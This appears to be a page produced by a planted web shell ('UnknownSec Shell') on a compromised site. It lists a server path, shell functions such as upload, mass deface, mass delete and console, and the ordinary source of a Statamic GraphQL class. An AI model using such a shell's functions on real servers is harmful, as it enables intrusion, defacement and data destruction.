shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
lolasweb.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
src
/
GraphQL
/
Types
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
GridItemType.php
<?php namespace Statamic\GraphQL\Types; use Rebing\GraphQL\Support\Type; use Statamic\Facades\GraphQL; class GridItemType extends Type { protected $fieldtype; public function __construct($fieldtype, $name) { $this->fieldtype = $fieldtype; $this->attributes['name'] = $name; } public function fields(): array { $fields = $this->fieldtype->fields()->toGql(); return $fields ->merge([ 'id' => [ 'type' => GraphQL::string(), ], ]) ->map(function ($field) use ($fields) { $field['resolve'] = function ($row, $args, $context, $info) use ($fields) { return ($resolver = $fields[$info->fieldName]['resolve'] ?? null) ? $resolver($row, $args, $context, $info) : $row[$info->fieldName]; }; return $field; }) ->all(); } }
© 2026 UnknownSec